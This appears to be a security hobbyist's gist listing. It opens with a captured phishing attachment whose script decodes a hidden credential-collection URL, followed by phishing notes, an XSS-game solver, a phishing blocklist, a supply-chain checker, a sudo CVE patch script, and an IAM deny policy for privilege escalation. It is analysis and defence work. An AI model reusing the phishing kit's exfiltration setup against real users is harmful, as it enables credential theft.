miglen

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <script>
        let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address

        let BASED64_ENCODED_EMAIL = "";  // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank

        let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here

miglen

This is the contents from a phishing attemt I had recieved recently.

Workflow

1. Recieve an attachment.html usually from a free email service.
2. The email contains html file with encoded JS that would call http://angelotti.it/cms/moj1.js
3. Once you open the html file an outlook login portal will be visualized to authenticate.

IoCs:

miglen

Today I had recieved an interesting phishing message via Messenger from a frend, who's also a tech guy so it was suprirpising that he got compromised.

The initial message said:

Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR

The url loaded from any browser, orther than mobile will redirect to twitch.tv otherwise it would display the following html:

miglen

import requests
import time
import urllib.parse
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException

url = "https://xss-game.appspot.com/level1/frame"
response = requests.get(url)
soup = BeautifulSoup(response.text)

miglen

# Source https://github.com/Esox-Lucius/PiHoleblocklists
0-800-email.com
0-aprcredit-card.website
0-aprcredit-cards.website
0-aprcreditcard.website
0-aprcreditcards.website
0-secure-paypal.com
0.0.0.0	0-0.028.openvpn.cloud.btcchina.com
0.0.0.0	0-100-195.btcc.com
0.0.0.0	0-100-bhd.foxypool.cf

miglen

Overview

The following page contains my notes and links about the seminar we had @ Softuni on Vulnerability management in package dependencies at 31st of August 2021.

miglen

#!/bin/env python3
# https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/
# The following script finds all package.json files in the current dir and checks if there are referenced any
# dependencies that no public package is available for, making your application vulnerable to supply-chain attack.
# Simply run ./packagejson.py in your root repository direcotory.
import json
import requests
from pathlib import Path
import urllib.parse

miglen

<?xml version="1.0" encoding="UTF-8"?>

<opml version="1.0">
    <head>
        <title>AWS RSS feeds 2019-04-22</title>
    </head>
    <body>
        <outline text="AWS" title="AWS">
            <outline type="rss" text="Infrastructure &amp; Automation" title="Infrastructure &amp; Automation" xmlUrl="https://aws.amazon.com/blogs/infrastructure-and-automation/feed/" htmlUrl="https://aws.amazon.com/blogs/infrastructure-and-automation/"/>
            <outline type="rss" text="AWS Developer Blog" title="AWS Developer Blog" xmlUrl="http://feeds.feedburner.com/AwsDeveloperBlog" htmlUrl="https://aws.amazon.com/blogs/developer/"/>

miglen

#!/bin/bash
# Test and patch CVE-2021-3156

patch() {
  # Simple method to patch with yum | apt
  if command -v apt-get >/dev/null; then
    sudo apt-get update
    sudo apt-get install $1
  elif command -v yum >/dev/null; then
    sudo yum updateinfo $1

miglen

{
	"Version": "2012-10-17",
	"Statement": [{
		"Sid": "DenyPriviledgeEscallationActions",
		"Effect": "Deny",
		"Action": [
			"cloudformation:CreateStack",
			"codestar:AssociateTeamMember",
			"codestar:CreateProject",
			"codestar:CreateProjectFromTemplate",